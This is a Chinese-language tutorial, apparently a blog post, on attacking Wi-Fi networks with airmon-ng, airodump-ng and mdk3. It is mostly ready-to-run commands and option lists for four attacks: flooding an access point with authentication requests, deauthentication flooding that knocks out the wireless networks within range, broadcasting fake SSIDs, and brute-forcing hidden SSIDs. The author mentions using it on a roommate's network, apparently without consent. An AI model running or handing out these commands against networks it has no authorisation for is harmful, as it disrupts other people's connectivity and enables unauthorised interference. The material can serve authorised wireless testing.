- 激活网卡为监听模式
airmon-ng start wlan0
- 扫描附近的无线信号
airodump-ng mon0
方法一:身份验证攻击
这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应
- mdk3 mon0 a
-a<ap_mac>#测试指定BSSID
-m#使用有效数据库中的客户端mac地址
-c#对应 -a ,不检查是否测试成功
-i<ap_mac>#对指定BSSID进行智能攻击
-s<pps>#速率,默认50
- mdk3 网卡 攻击模式 目标
mdk3 mon0 a -aMAC
以下是攻击宿友电脑创建的无线,效果如下。
方法二:伪造断开连接
在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!
- mdk3 mon0 d
-w<filename>#白名单mac地址列表文件
-b<filename>#黑名单mac地址列表文件
-s<pps>#速率,这个模式下默认无限制
-c[chan,chan,chan,...]#信道,可以多填,如 2,4,5,1
- mdk3 mon0 d -c 11
以下是方法二测试视频:
方法三:伪造AP
产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋
- mdk3 mon0 b
- -n<ssid>#自定义ESSID
-f<filename>#读取ESSID列表文件
-v<filename>#自定义ESSID和BSSID对应列表文件
-d #自定义为Ad-Hoc模式
-w #自定义为wep模式
-g #54Mbit模式
-t # WPA TKIP encryption
-a#WPA AES encryption
-m#读取数据库的mac地址
-c<chan>#自定义信道
-s<pps>#发包速率
- mdk3 --help b #查看详细内容
方法四:探测AP信息和ESSID猜解模式
- mdk3 mon0 p
-e<ssid>#待检测的ssid
-f<filename>#检测AP设置为隐藏的ssid列表文件
-t<bssid>#用bssid检测AP的信息
-s<pps>#速率,默认300
-b<characterset>#设置字符集